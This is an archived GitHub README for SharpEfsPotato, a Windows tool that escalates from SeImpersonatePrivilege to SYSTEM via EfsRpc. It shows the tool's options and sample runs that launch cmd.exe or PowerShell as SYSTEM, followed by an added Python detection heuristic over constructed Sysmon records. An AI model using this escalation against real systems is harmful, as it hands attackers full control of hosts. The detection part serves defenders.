GitHub - bugch3ck/SharpEfsPotato: Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

By bugch3ck

Archived: 2026-04-05 23:19:59 UTC

README

Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

Usage

```
C:\temp>SharpEfsPotato.exe -h
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
-p, --prog=VALUE Program to launch (default cmd.exe)
-a, --args=VALUE Arguments for program (default null)
-h, --help Display this help
```

Examples

Default behavior: Start cmd.exe as system in a separate process (in separate console)

```
C:\temp>SharpEfsPotato.exe
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f/\44259a4a-cbe
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
```
Specify PowerShell binary and arguments

```
C:\temp>SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Conten
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system
```

Source: https://github.com/bugch3ck/SharpEfsPotato
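For defenders, both runs shown in this README end with a program running as SYSTEM that was launched from a process under a non-SYSTEM account, which is visible in process-creation telemetry. The following is an added example, not part of the SharpEfsPotato project: a Python heuristic over constructed records that use Sysmon Event ID 1 field names (`User`, `ParentUser`, `Image`, `ParentImage`). The service-account list, the scoring, and the premise that the launched program is logged as a child of the launching process are assumptions of the example.

```python
import ntpath

SYSTEM = "NT AUTHORITY\\SYSTEM"
# Assumed list of service identities that normally hold SeImpersonatePrivilege.
SERVICE_PREFIXES = ("NT AUTHORITY\\NETWORK SERVICE", "NT AUTHORITY\\LOCAL SERVICE",
                    "IIS APPPOOL\\", "NT SERVICE\\")
# Programs launched in the README's two examples.
SHELLS = {"cmd.exe", "powershell.exe"}


def find_system_children(events):
    """Return scored findings for SYSTEM processes created by non-SYSTEM parents."""
    findings = []
    for ev in events:
        user = ev.get("User", "").upper()
        parent_user = ev.get("ParentUser", "").upper()
        # Only a change of identity from a non-SYSTEM parent to SYSTEM is of interest.
        if user != SYSTEM or not parent_user or parent_user == SYSTEM:
            continue
        score = 1
        if parent_user.startswith(SERVICE_PREFIXES):
            score += 1  # parent is a service identity
        if ntpath.basename(ev.get("Image", "")).lower() in SHELLS:
            score += 1  # child is an interactive shell
        findings.append({"image": ev.get("Image", ""), "parent": ev.get("ParentImage", ""),
                         "parent_user": ev.get("ParentUser", ""), "score": score})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed sample records (not real logs), Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe", "User": r"IIS APPPOOL\DefaultAppPool",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "ParentUser": SYSTEM},
    {"Image": r"C:\Windows\System32\cmd.exe", "User": SYSTEM,
     "ParentImage": r"C:\temp\SharpEfsPotato.exe", "ParentUser": r"IIS APPPOOL\DefaultAppPool"},
    {"Image": r"C:\Windows\System32\svchost.exe", "User": SYSTEM,
     "ParentImage": r"C:\Windows\System32\services.exe", "ParentUser": SYSTEM},
    {"Image": r"C:\Program Files\Example\updater.exe", "User": SYSTEM,
     "ParentImage": r"C:\Users\alice\Downloads\setup.exe", "ParentUser": r"CORP\alice"},
]

if __name__ == "__main__":
    for f in find_system_children(SAMPLE_EVENTS):
        print(f"score={f['score']} {f['parent_user']} -> SYSTEM: {f['parent']} spawned {f['image']}")
```

The score only ranks findings for triage; legitimate software can also start SYSTEM processes from other accounts, so results need baselining per environment.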